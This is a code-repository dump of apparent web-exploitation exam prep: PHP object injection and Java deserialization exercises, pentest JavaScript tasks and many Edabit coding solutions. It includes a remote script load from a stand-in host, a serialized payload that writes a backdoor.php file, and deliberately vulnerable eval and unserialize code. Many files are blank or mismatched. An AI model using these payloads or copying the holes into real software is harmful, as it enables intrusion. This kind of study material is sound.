├── From SQL Injection to Shell
├── shell.php3
└── README.md
├── Edabit
├── javascript
│ ├── nine.js
│ ├── ten.js
│ ├── nineteen.js
│ ├── sixteen.js
│ ├── fourteen.js
│ ├── three.js
│ ├── eight.js
│ ├── twelve.js
│ ├── one.js
│ ├── twenty-six.js
│ ├── eighteen.js
│ ├── seven.js
│ ├── twenty-one.js
│ ├── five.js
│ ├── fifteen.js
│ ├── four.js
│ ├── six.js
│ ├── twenty.js
│ ├── eleven.js
│ ├── seventeen.js
│ ├── two.js
│ └── thirteen.js
├── php
│ ├── fourteen.php
│ ├── twenty.php
│ ├── six.php
│ ├── twenty-two.php
│ ├── eighteen.php
│ ├── twelve.php
│ ├── thirteen.php
│ ├── nine.php
│ ├── thirty-one.php
│ ├── thirty-seven.php
│ ├── twenty-one.php
│ ├── forty.php
│ ├── thirty-three.php
│ ├── fifteen.php
│ ├── thirty-six.php
│ ├── twenty-nine.php
│ ├── seventeen.php
│ ├── four.php
│ ├── twenty-six.php
│ ├── twenty-three.php
│ ├── thirty-eight.php
│ ├── three.php
│ ├── eight.php
│ ├── twenty-eight.php
│ ├── eleven.php
│ ├── two.php
│ ├── thirty-two.php
│ ├── sixteen.php
│ ├── seven.php
│ ├── thirty.php
│ ├── one.php
│ ├── twenty-four.php
│ ├── forty-one.php
│ ├── thirty-nine.php
│ ├── twenty-five.php
│ ├── five.php
│ ├── nineteen.php
│ ├── ten.php
│ ├── thirty-five.php
│ ├── thirty-four.php
│ └── twenty-seven.php
├── java
│ ├── two.java
│ ├── three.java
│ ├── fifteen.java
│ ├── fourteen.java
│ ├── eight.java
│ ├── six.java
│ ├── one.java
│ ├── twenty-one.java
│ ├── twenty-two.java
│ ├── ten.java
│ ├── four.java
│ ├── nine.java
│ ├── eleven.java
│ ├── seven.java
│ ├── thirty-four.java
│ ├── eighteen.java
│ ├── twenty-six.java
│ ├── five.java
│ ├── twelve.java
│ ├── twenty.java
│ ├── twenty-three.java
│ ├── twenty-seven.java
│ ├── twenty-five.java
│ ├── seventeen.java
│ ├── nineteen.java
│ ├── thirteen.java
│ ├── thirty-two.java
│ ├── thirty-one.java
│ ├── twenty-four.java
│ ├── thirty-three.java
│ ├── twenty-eight.java
│ ├── sixteen.java
│ ├── thirty.java
│ └── twenty-nine.java
└── README.md
├── \dev\random: Pipe
├── example.php
├── pipe.jpg
├── php_object_injection.webm
├── payload-gen.php
├── weaponized_exploit
│ ├── custom_class.php
│ └── exploit.php
├── log.php
└── README.md
├── XSS and MySQL
├── sploit.webm
├── cJack.js
├── README.md
└── exploit.js
├── JavaScript For Pentesters
├── encoder.py
├── Leveraging-JavaScript
│ ├── task9-remote_load.js
│ ├── task11-replace_banner.js
│ ├── task10-download_restrictions.js
│ ├── task6-cap_clicks.js
│ ├── task12-auto_complete_grab.js
│ ├── task8-event_listener.js
│ ├── task7-keylogger.js
│ └── task5-rm_field.js
├── README.md
├── Modifying-HTML
│ ├── task1-modify.js
│ ├── task2-change_links.js
│ ├── task3-redirect_input.js
│ └── task4-new_field.js
├── XMLHttpRequests
│ ├── task14-xml_fetch.js
│ ├── task15-data_exfil.js
│ ├── task16-csrf_grab.js
│ ├── task13_xml_post.js
│ └── task17-csrf_token_jack.js
└── Parsing
│ ├── task18-html_parsing.js
│ ├── task20-multi_level_json.js
│ ├── task21-multi_level_xml.js
│ └── task19-multi_level_parsing.js
├── Practicing Java Deserialization Exploits
├── client
│ ├── rawcnt.bin
│ └── client_traffic.txt
├── server
│ ├── rawser.bin
│ └── server_traffic.txt
├── vuln_traffic.pcapng
├── java-deserialization.webm
├── convert.py
├── README.md
├── decipher.txt
└── exploit.py
├── Understanding PHP Object Injection
├── injection2.php
├── injection.php
├── example_usage_log.php
├── README.md
├── class.php
├── index1.php
├── class-deserialize.php
├── class-serialize.php
├── logfile.php
├── index2.php
├── class-magic-examples.php
└── ser-magic-funcs.php
├── Understanding Java Deserialization
├── vuln_example2
│ └── src
│ │ ├── Program.java
│ │ ├── LogFile.java
│ │ └── Utils.java
├── README.md
├── vuln_example
│ └── src
│ │ ├── Program.java
│ │ ├── LogFile.java
│ │ └── Utils.java
├── deser_example.java
├── ser_example.java
└── reversed-bytes.c
├── Simple Object Oriented Language Examples
├── README.md
├── class-example.py
├── class-example.js
├── class-example.java
└── class-example.php
└── README.md
/From SQL Injection to Shell/shell.php3:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Edabit/javascript/nine.js:
--------------------------------------------------------------------------------
1 | function addition(num) {
2 | return ++num;
3 | }
4 |
--------------------------------------------------------------------------------
/\dev\random: Pipe/example.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/Edabit/javascript/ten.js:
--------------------------------------------------------------------------------
1 | function numArgs() {
2 | return arguments.length
3 | }
4 |
--------------------------------------------------------------------------------
/Edabit/javascript/nineteen.js:
--------------------------------------------------------------------------------
1 | function find_index(arr, str) {
2 | return arr.indexOf(str);
3 | }
4 |
--------------------------------------------------------------------------------
/Edabit/javascript/sixteen.js:
--------------------------------------------------------------------------------
1 | function Go(num) {
2 | let str = "-".repeat(num);
3 | return str;
4 | }
5 |
--------------------------------------------------------------------------------
/XSS and MySQL/sploit.webm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/whoisflynn/AWAE-PREP/HEAD/XSS and MySQL/sploit.webm
--------------------------------------------------------------------------------
/\dev\random: Pipe/pipe.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/whoisflynn/AWAE-PREP/HEAD/\dev\random: Pipe/pipe.jpg
--------------------------------------------------------------------------------
/Edabit/javascript/fourteen.js:
--------------------------------------------------------------------------------
1 | function calculateExponent(num, exp) {
2 | return Math.pow(num, exp);
3 | }
4 |
--------------------------------------------------------------------------------
/Edabit/javascript/three.js:
--------------------------------------------------------------------------------
1 |
8 |
--------------------------------------------------------------------------------
/XSS and MySQL/cJack.js:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Edabit/javascript/eight.js:
--------------------------------------------------------------------------------
1 | function comp(str1, str2) {
2 | if (str1.length == str2.length)
3 | return true;
4 | return false;
5 | }
6 |
--------------------------------------------------------------------------------
/Edabit/javascript/twelve.js:
--------------------------------------------------------------------------------
1 | function findDigitAmount(num) {
2 | let int_string = num.toString();
3 | return int_string.length;
4 | }
5 |
--------------------------------------------------------------------------------
/\dev\random: Pipe/php_object_injection.webm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/whoisflynn/AWAE-PREP/HEAD/\dev\random: Pipe/php_object_injection.webm
--------------------------------------------------------------------------------
/JavaScript For Pentesters/encoder.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | import urllib,sys
4 |
5 | print urllib.quote_plus("".join(sys.stdin.readlines()))
6 |
--------------------------------------------------------------------------------
/Edabit/javascript/one.js:
--------------------------------------------------------------------------------
1 |
8 |
--------------------------------------------------------------------------------
/Edabit/javascript/twenty-six.js:
--------------------------------------------------------------------------------
1 | function isValidPhoneNumber($str) {
2 | return (preg_match("/^\(\d{3}\) \d{3}-\d{4}$/", $str)) ? true : false;
3 | }
4 |
--------------------------------------------------------------------------------
/Edabit/javascript/eighteen.js:
--------------------------------------------------------------------------------
1 | function MultiplyByLength(arr) {
2 | for (let i = 0; i < arr.length; i++)
3 | arr[i] = arr[i] * arr.length;
4 | return arr;
5 | }
6 |
--------------------------------------------------------------------------------
/Edabit/javascript/seven.js:
--------------------------------------------------------------------------------
1 | function factorial(x) {
2 | let f = 1;
3 | if (x >= 0)
4 | for (let i = 1; i < (x+1); i++)
5 | f *= i;
6 | return f;
7 | }
8 |
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/client/rawcnt.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/whoisflynn/AWAE-PREP/HEAD/Practicing Java Deserialization Exploits/client/rawcnt.bin
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/server/rawser.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/whoisflynn/AWAE-PREP/HEAD/Practicing Java Deserialization Exploits/server/rawser.bin
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/vuln_traffic.pcapng:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/whoisflynn/AWAE-PREP/HEAD/Practicing Java Deserialization Exploits/vuln_traffic.pcapng
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Leveraging-JavaScript/task9-remote_load.js:
--------------------------------------------------------------------------------
1 | // http://pentesteracademylab.appspot.com/lab/webapp/jfp/9
2 |
3 |
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/java-deserialization.webm:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/whoisflynn/AWAE-PREP/HEAD/Practicing Java Deserialization Exploits/java-deserialization.webm
--------------------------------------------------------------------------------
/Edabit/javascript/twenty-one.js:
--------------------------------------------------------------------------------
1 | function factorial(int) {
2 | let fact = 1;
3 | if (int >= 0)
4 | for (let i = 1; i < (int+1); i++)
5 | fact = fact*i;
6 | return fact;
7 | }
8 |
--------------------------------------------------------------------------------
/Edabit/php/fourteen.php:
--------------------------------------------------------------------------------
1 |
10 |
--------------------------------------------------------------------------------
/Edabit/php/twenty.php:
--------------------------------------------------------------------------------
1 |
11 |
--------------------------------------------------------------------------------
/Edabit/javascript/five.js:
--------------------------------------------------------------------------------
1 |
8 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/injection2.php:
--------------------------------------------------------------------------------
1 | filename = 'x';
7 |
8 | echo serialize($obj);
9 |
10 | ?>
11 |
--------------------------------------------------------------------------------
/Edabit/php/six.php:
--------------------------------------------------------------------------------
1 |
11 |
--------------------------------------------------------------------------------
/Edabit/php/twenty-two.php:
--------------------------------------------------------------------------------
1 |
11 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/README.md:
--------------------------------------------------------------------------------
1 | # Javascript for Pentesters
2 |
3 | Simple 2 hour course that covers using JavaScript for pentesting.
4 |
5 | ## Links
6 |
7 | - https://www.pentesteracademy.com/course?id=11
8 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/injection.php:
--------------------------------------------------------------------------------
1 | filename = '.htaccess';
7 |
8 | echo serialize($obj)."\n";
9 |
10 | ?>
11 |
--------------------------------------------------------------------------------
/Edabit/php/eighteen.php:
--------------------------------------------------------------------------------
1 |
13 |
--------------------------------------------------------------------------------
/Edabit/php/twelve.php:
--------------------------------------------------------------------------------
1 |
2 |
12 |
--------------------------------------------------------------------------------
/Edabit/php/thirteen.php:
--------------------------------------------------------------------------------
1 |
12 |
--------------------------------------------------------------------------------
/Edabit/javascript/fifteen.js:
--------------------------------------------------------------------------------
1 | function charCount(myChar, str) {
2 | let list = str.split('')
3 | let ctr = 0;
4 | for (let i = 0; i < str.length; i++)
5 | if (list[i] == myChar)
6 | ctr++;
7 | return ctr;
8 | }
9 |
--------------------------------------------------------------------------------
/Edabit/javascript/four.js:
--------------------------------------------------------------------------------
1 |
12 |
--------------------------------------------------------------------------------
/Edabit/javascript/six.js:
--------------------------------------------------------------------------------
1 |
11 |
--------------------------------------------------------------------------------
/Edabit/php/nine.php:
--------------------------------------------------------------------------------
1 |
12 |
--------------------------------------------------------------------------------
/Edabit/php/thirty-one.php:
--------------------------------------------------------------------------------
1 |
11 |
--------------------------------------------------------------------------------
/Edabit/php/thirty-seven.php:
--------------------------------------------------------------------------------
1 |
14 |
--------------------------------------------------------------------------------
/Edabit/javascript/twenty.js:
--------------------------------------------------------------------------------
1 | function reverse(bool) {
2 | if (typeof bool != 'boolean') {
3 | return "boolean expected";
4 | }
5 | else {
6 | if (bool == true)
7 | return false;
8 | else
9 | return true;
10 | }
11 | }
12 |
--------------------------------------------------------------------------------
/Edabit/php/twenty-one.php:
--------------------------------------------------------------------------------
1 |
13 |
--------------------------------------------------------------------------------
/Edabit/javascript/eleven.js:
--------------------------------------------------------------------------------
1 | function isAvgWhole(arr) {
2 | let v = 0;
3 | for (let i = 0;i < arr.length; i++)
4 | {
5 | v += arr[i];
6 | }
7 | v /= arr.length;
8 |
9 | return (((v % 1) == 0) ? true : false);
10 | }
11 |
--------------------------------------------------------------------------------
/Edabit/php/forty.php:
--------------------------------------------------------------------------------
1 |
14 |
--------------------------------------------------------------------------------
/Edabit/php/thirty-three.php:
--------------------------------------------------------------------------------
1 |
12 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Modifying-HTML/task1-modify.js:
--------------------------------------------------------------------------------
1 |
6 |
--------------------------------------------------------------------------------
/Edabit/php/fifteen.php:
--------------------------------------------------------------------------------
1 |
12 |
--------------------------------------------------------------------------------
/Edabit/php/thirty-six.php:
--------------------------------------------------------------------------------
1 |
6 | return preg_replace('/[^A-Za-z0-9\-_\ ]/', '', $str);
7 | }
8 |
9 | echo removeSpecialCharacters("hello$ $%#world")."\n";
10 |
11 | ?>
12 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/example_usage_log.php:
--------------------------------------------------------------------------------
1 | filename = "somefile.log";
8 | $obj->LogData("test");
9 |
10 | // destructor will be called and file will be deleted
11 |
12 | ?>
13 |
--------------------------------------------------------------------------------
/Edabit/php/twenty-nine.php:
--------------------------------------------------------------------------------
1 |
14 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Leveraging-JavaScript/task11-replace_banner.js:
--------------------------------------------------------------------------------
1 |
5 |
--------------------------------------------------------------------------------
/Edabit/php/seventeen.php:
--------------------------------------------------------------------------------
1 |
16 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Leveraging-JavaScript/task10-download_restrictions.js:
--------------------------------------------------------------------------------
1 | // http://pentesteracademylab.appspot.com/lab/webapp/jfp/10
2 | var newtag = document.createElement("script");
3 | newtag.type = "text/javascript";
4 | newtag.src = "http://X.X.X.X/test.js";
5 | document.body.appendChild(newtag);
6 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Leveraging-JavaScript/task6-cap_clicks.js:
--------------------------------------------------------------------------------
1 |
9 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Leveraging-JavaScript/task12-auto_complete_grab.js:
--------------------------------------------------------------------------------
1 |
8 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Leveraging-JavaScript/task8-event_listener.js:
--------------------------------------------------------------------------------
1 |
10 |
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/client/client_traffic.txt:
--------------------------------------------------------------------------------
1 | aced00057704f000baaa77020101770900077765747730726b737200146e622e64657365722e4861736852657175657374e52ce9a92ac1f9910200024c000a64617461546f486173687400124c6a6176612f6c616e672f537472696e673b4c00077468654861736871007e0001787074000a695f6c696b655f706965740000
2 |
--------------------------------------------------------------------------------
/Edabit/php/four.php:
--------------------------------------------------------------------------------
1 |
15 |
--------------------------------------------------------------------------------
/Edabit/php/twenty-six.php:
--------------------------------------------------------------------------------
1 | = 1)
9 | for ($i = 0; $i < $oln; $i++)
10 | $arr[$i] = '#';
11 | return implode('', $arr);
12 | }
13 |
14 | print_r(maskify("4556364607935616"));
15 |
16 | ?>
17 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Leveraging-JavaScript/task7-keylogger.js:
--------------------------------------------------------------------------------
1 |
10 |
--------------------------------------------------------------------------------
/Edabit/php/twenty-three.php:
--------------------------------------------------------------------------------
1 |
17 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Modifying-HTML/task2-change_links.js:
--------------------------------------------------------------------------------
1 |
11 |
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/server/server_traffic.txt:
--------------------------------------------------------------------------------
1 | aced00057704f000baaa77020101737200146e622e64657365722e4861736852657175657374e52ce9a92ac1f9910200024c000a64617461546f486173687400124c6a6176612f6c616e672f537472696e673b4c00077468654861736871007e0001787074000a695f6c696b655f7069657400203238373831393632623734306235303662313032653563616637363436653138
2 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/vuln_example2/src/Program.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 |
3 | public class Program
4 | {
5 | public static void main(String[] args)
6 | {
7 | LogFile obj = new LogFile();
8 | String file = "Example.ser";
9 |
10 | // deserialization of the object
11 | Utils.DeserializeFromFile(file);
12 | }
13 | }
14 |
--------------------------------------------------------------------------------
/Edabit/javascript/seventeen.js:
--------------------------------------------------------------------------------
1 | function month_name(num) {
2 | var dict = [
3 | "NULL",
4 | "January",
5 | "February",
6 | "March",
7 | "April",
8 | "May",
9 | "June",
10 | "July",
11 | "August",
12 | "September",
13 | "October",
14 | "November",
15 | "December",
16 | ]
17 | return dict[num];
18 | }
19 |
--------------------------------------------------------------------------------
/Edabit/php/thirty-eight.php:
--------------------------------------------------------------------------------
1 |
16 |
--------------------------------------------------------------------------------
/Edabit/php/three.php:
--------------------------------------------------------------------------------
1 |
17 |
--------------------------------------------------------------------------------
/Edabit/php/eight.php:
--------------------------------------------------------------------------------
1 |
18 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/README.md:
--------------------------------------------------------------------------------
1 | # Understanding PHP Object Injection
2 |
3 | This tutorial is 10/10 in explaining PHP Object Injection. Be sure to walkthrough all code and simulate it.
4 |
5 | ## Links
6 |
7 | - https://securitycafe.ro/2015/01/05/understanding-php-object-injection/
8 | - https://nitesculucian.github.io/2018/10/05/php-object-injection-cheat-sheet/
9 |
--------------------------------------------------------------------------------
/\dev\random: Pipe/payload-gen.php:
--------------------------------------------------------------------------------
1 | filename = "/var/www/html/images/backdoor.php";
14 | $obj->data = '';
15 |
16 | echo serialize($obj)."\n";
17 |
18 | ?>
19 |
--------------------------------------------------------------------------------
/Edabit/php/twenty-eight.php:
--------------------------------------------------------------------------------
1 |
21 |
--------------------------------------------------------------------------------
/Edabit/php/eleven.php:
--------------------------------------------------------------------------------
1 |
17 |
--------------------------------------------------------------------------------
/Simple Object Oriented Language Examples/README.md:
--------------------------------------------------------------------------------
1 | # Simple Object Oriented Language Examples
2 |
3 | I went ahead and created a simple class in Java, JavaScript, PHP, and Python. These examples are great if you need a reference or refresher for calls when auditing or reviewing source code
4 |
5 | - class-example.java
6 | - class-example.js
7 | - class-example.php
8 | - class-example.py
9 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/class.php:
--------------------------------------------------------------------------------
1 | variable;
10 | }
11 | }
12 |
13 | $object = new TestClass(); // create an object
14 | $object->PrintVariable(); // call a method
15 |
16 | ?>
17 |
--------------------------------------------------------------------------------
/Edabit/java/two.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes two integers as arguments and return their sum.
4 |
5 | */
6 |
7 | public class Program
8 | {
9 | public static int SumOfTwoNumbers(int a, int b)
10 | {
11 | return a + b;
12 | }
13 |
14 | public static void main(String[] args)
15 | {
16 | System.out.printf("%s\n", SumOfTwoNumbers(3, 2));
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/convert.py:
--------------------------------------------------------------------------------
1 | byte_str = (
2 | "aced00057704f000baaa77020101770900077765747730726b737200146e622e64657365722e4861736852657175657374e52ce9a92ac1f9910200024c000a64617461546f486173687400124c6a6176612f6c616e672f537472696e673b4c00077468654861736871007e0001787074000a695f6c696b655f706965740000"
3 | )
4 |
5 | open("rawcnt.bin", 'wb').write(byte_str.decode('hex'))
6 |
--------------------------------------------------------------------------------
/Edabit/java/three.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that accepts an array and returns the last item in the array.
4 |
5 | */
6 |
7 | public class Program
8 | {
9 | public static int getLastItem(int[] nums)
10 | {
11 | return nums[nums.length-1];
12 | }
13 |
14 | public static void main(String[] args)
15 | {
16 | System.out.printf("%d\n", getLastItem(new int[]{1, 2, 3}));
17 | }
18 | }
19 |
--------------------------------------------------------------------------------
/Edabit/php/two.php:
--------------------------------------------------------------------------------
1 |
16 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/index1.php:
--------------------------------------------------------------------------------
1 | name." is ".$this->age." years old.\n";
14 | }
15 | }
16 |
17 | $user = unserialize($_GET['serialized_user']);
18 |
19 | ?>
20 |
--------------------------------------------------------------------------------
/Edabit/php/thirty-two.php:
--------------------------------------------------------------------------------
1 |
21 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/README.md:
--------------------------------------------------------------------------------
1 | # Understanding Java Deserialization
2 |
3 | This tutorial covers Java Deserialization exploitation. It's excellent at showing the concept, and you'll find out fast it's very similiar to PHP Object Injection the only difference is Java is compiled and the serialized objects structure.
4 |
5 | ## Links
6 |
7 | - https://nytrosecurity.com/2018/05/30/understanding-java-deserialization/
8 |
--------------------------------------------------------------------------------
/Edabit/php/sixteen.php:
--------------------------------------------------------------------------------
1 |
20 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/class-deserialize.php:
--------------------------------------------------------------------------------
1 | name." is ".$this->age." years old.";
11 | }
12 | }
13 | // Create a user object and call PrintData()
14 | $u = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:6:"Milton";}');
15 | $u->PrintData();
16 |
17 | ?>
18 |
--------------------------------------------------------------------------------
/Edabit/php/seven.php:
--------------------------------------------------------------------------------
1 |
21 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/vuln_example/src/Program.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 |
3 | public class Program
4 | {
5 | public static void main(String[] args)
6 | {
7 | LogFile obj = new LogFile();
8 | Utils lol = new Utils();
9 | String file = "Log.ser";
10 |
11 | obj.filename = "wetw0rk.log";
12 | obj.filecontent = "No actions logged";
13 |
14 | Utils.SerializeToFile(obj, file);
15 | }
16 | }
17 |
--------------------------------------------------------------------------------
/Edabit/php/thirty.php:
--------------------------------------------------------------------------------
1 |
26 |
--------------------------------------------------------------------------------
/Edabit/java/fifteen.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes a string and returns the word count.
4 | The string will be a sentence.
5 |
6 | */
7 |
8 | public class Program
9 | {
10 | public static int countWords(String s)
11 | {
12 | return s.split(" ").length;
13 | }
14 |
15 | public static void main(String[] args)
16 | {
17 | System.out.printf("%d\n", countWords("Just an example here move along"));
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/Edabit/java/fourteen.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes a string as its argument
4 | and returns the string in reversed order.
5 |
6 | */
7 |
8 | public class Program
9 | {
10 | public static String reverse(final String str)
11 | {
12 | return new StringBuffer(str).reverse().toString();
13 | }
14 |
15 | public static void main(String[] args)
16 | {
17 | System.out.printf("%s\n", reverse("ls"));
18 | }
19 | }
20 |
--------------------------------------------------------------------------------
/Edabit/php/one.php:
--------------------------------------------------------------------------------
1 |
23 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/XMLHttpRequests/task14-xml_fetch.js:
--------------------------------------------------------------------------------
1 |
14 |
--------------------------------------------------------------------------------
/Edabit/java/eight.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a function that takes a two strings and returns true if
4 | the first argument ends with the second argument; otherwise
5 | return false.
6 |
7 | */
8 |
9 | public class Program
10 | {
11 | public static boolean checkEnding(String str1, String str2)
12 | {
13 | return str1.endsWith(str2);
14 | }
15 |
16 | public static void main(String[] args)
17 | {
18 | System.out.printf("%b\n", checkEnding("abc", "bc"));
19 | }
20 | }
21 |
--------------------------------------------------------------------------------
/Edabit/php/twenty-four.php:
--------------------------------------------------------------------------------
1 | = 5 && $arr[$i] != "lassen")
12 | $arr[$i] = strrev($arr[$i]);
13 | return implode(' ', $arr);
14 | }
15 |
16 | $example = "sich die Wurst vom Brot nehem lassen";
17 |
18 | echo sprintf("%s\n", reverse($example));
19 |
20 | ?>
21 |
--------------------------------------------------------------------------------
/Edabit/java/six.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an array of integers and returns the smallest number in the set.
4 |
5 | */
6 |
7 | import static java.util.Arrays.stream;
8 |
9 | public class Program
10 | {
11 | public static int findSmallestInt(int[] args)
12 | {
13 | return stream(args).min().getAsInt();
14 | }
15 |
16 | public static void main(String[] args)
17 | {
18 | System.out.printf("%s\n", findSmallestInt(new int[]{34,15,88,2}));
19 | }
20 | }
21 |
--------------------------------------------------------------------------------
/Edabit/javascript/two.js:
--------------------------------------------------------------------------------
1 |
19 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/XMLHttpRequests/task15-data_exfil.js:
--------------------------------------------------------------------------------
1 |
14 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/class-serialize.php:
--------------------------------------------------------------------------------
1 | name." is ".$this->age.
11 | " years old.";
12 | }
13 | }
14 |
15 | $user = new User();
16 |
17 | $user->age = 20;
18 | $user->name = "Milton";
19 |
20 | $user->PrintData();
21 |
22 | // serialize object and print output
23 | echo serialize($user)."\n";
24 |
25 | ?>
26 |
--------------------------------------------------------------------------------
/Edabit/php/forty-one.php:
--------------------------------------------------------------------------------
1 | r = $radius;
8 | }
9 | public function getArea()
10 | {
11 | return pi() * $this->r * $this->r;
12 | }
13 | public function getPerimeter()
14 | {
15 | return 2 * pi() * $this->r;
16 | }
17 | }
18 |
19 | $circ = new Circle(11);
20 | echo $circ->getArea()."\n";
21 |
22 | $circ = new Circle(4.44);
23 | echo $circ->getPerimeter()."\n";
24 |
25 | ?>
26 |
--------------------------------------------------------------------------------
/\dev\random: Pipe/weaponized_exploit/custom_class.php:
--------------------------------------------------------------------------------
1 | filename = '';
10 | $this->data = '';
11 | }
12 |
13 | public function PrintLog()
14 | {
15 | $pre = "[LOG]";
16 | $now = date('Y-m-d H:i:s');
17 |
18 | $str = '$pre - $now - $this->data';
19 | eval("\$str = \"$str\";");
20 | echo $str;
21 | }
22 | }
23 | ?>
24 |
--------------------------------------------------------------------------------
/Edabit/javascript/thirteen.js:
--------------------------------------------------------------------------------
1 | function isSymmetrical(num) {
2 | let strArr = num.toString().split("");
3 | let str1 = "", str2 = "";
4 |
5 | for (let i = 0; i < Math.ceil(strArr.length/2); i++)
6 | str1 += strArr[i];
7 | if ((strArr.length % 2) == 1)
8 | str2 += strArr[Math.ceil(strArr.length/2)-1];
9 | for (let i = Math.ceil(strArr.length/2); i < strArr.length; i++)
10 | str2 += strArr[i];
11 | if (str1.split("").reverse().join("") == str2)
12 | return true;
13 | return false;
14 | }
15 |
--------------------------------------------------------------------------------
/Edabit/php/thirty-nine.php:
--------------------------------------------------------------------------------
1 |
22 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/logfile.php:
--------------------------------------------------------------------------------
1 | filename, $text, FILE_APPEND);
11 | }
12 | // destructor will delete the logfile
13 | public function __destruct()
14 | {
15 | echo "__destruct deletes (file): ".$this->filename."\n";
16 | unlink(dirname(__FILE__)."/".$this->filename);
17 | }
18 | }
19 |
20 | ?>
21 |
--------------------------------------------------------------------------------
/Edabit/java/one.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an integer as an argument and returns
4 | "even" for even integers and "odd" for odd integers.
5 |
6 | Run using:
7 | java one.java
8 |
9 | */
10 |
11 | public class Program
12 | {
13 | // internal function
14 | public static String isEvenOrOdd(int num)
15 | {
16 | return ((num % 2) == 0) ? "even" : "odd";
17 | }
18 | // main function
19 | public static void main(String[] args)
20 | {
21 | System.out.printf("%s\n", isEvenOrOdd(3));
22 | }
23 | }
24 |
--------------------------------------------------------------------------------
/Edabit/java/twenty-one.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that accepts a string (of a persons first and last name) and
4 | returns a string with the first and last name swapped.
5 |
6 | */
7 |
8 | public class Program
9 | {
10 | public static String nameShuffle(String s)
11 | {
12 | String[] arr = s.split(" ");
13 |
14 | return String.format("%s %s", arr[1], arr[0]);
15 | }
16 |
17 | public static void main(String[] args)
18 | {
19 | System.out.printf("%s\n", nameShuffle("Milton Valencia"));
20 | }
21 | }
22 |
--------------------------------------------------------------------------------
/Edabit/java/twenty-two.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes a string and returns a
4 | string with its letters in alphabetical order.
5 |
6 | */
7 |
8 | import java.util.Arrays;
9 |
10 | public class Program
11 | {
12 | public static String AlphabetSoup(String s)
13 | {
14 | char[] str = s.toCharArray();
15 | Arrays.sort(str);
16 |
17 | String ret = new String(str);
18 |
19 | return ret;
20 | }
21 |
22 | public static void main(String[] args)
23 | {
24 | System.out.printf("%s\n", AlphabetSoup("hello"));
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Leveraging-JavaScript/task5-rm_field.js:
--------------------------------------------------------------------------------
1 |
10 |
--------------------------------------------------------------------------------
/Edabit/java/ten.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes a string and returns a
4 | string in which each character is repeated once.
5 |
6 | */
7 |
8 | public class Program
9 | {
10 | public static String doubleChar(String s)
11 | {
12 | String[] arr = s.split("");
13 | String finalStr = "";
14 |
15 | for (int i = 0; i < arr.length; i++)
16 | finalStr += arr[i] + arr[i];
17 |
18 | return finalStr;
19 | }
20 |
21 | public static void main(String[] args)
22 | {
23 | System.out.printf("%s\n", doubleChar("String"));
24 | }
25 | }
26 |
--------------------------------------------------------------------------------
/Edabit/php/twenty-five.php:
--------------------------------------------------------------------------------
1 |
27 |
--------------------------------------------------------------------------------
/Edabit/java/four.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Take an array of integers (positive or negative or both) and return
4 | the sum of the absolute value of each element.
5 |
6 | */
7 |
8 | import java.util.stream.*;
9 |
10 | public class Program
11 | {
12 | public static int getAbsSum(int[] nums)
13 | {
14 | int sum = 0;
15 | for (int i = 0; i < nums.length; i++)
16 | sum += Math.abs(nums[i]);
17 | return sum;
18 | }
19 |
20 | public static void main(String[] args)
21 | {
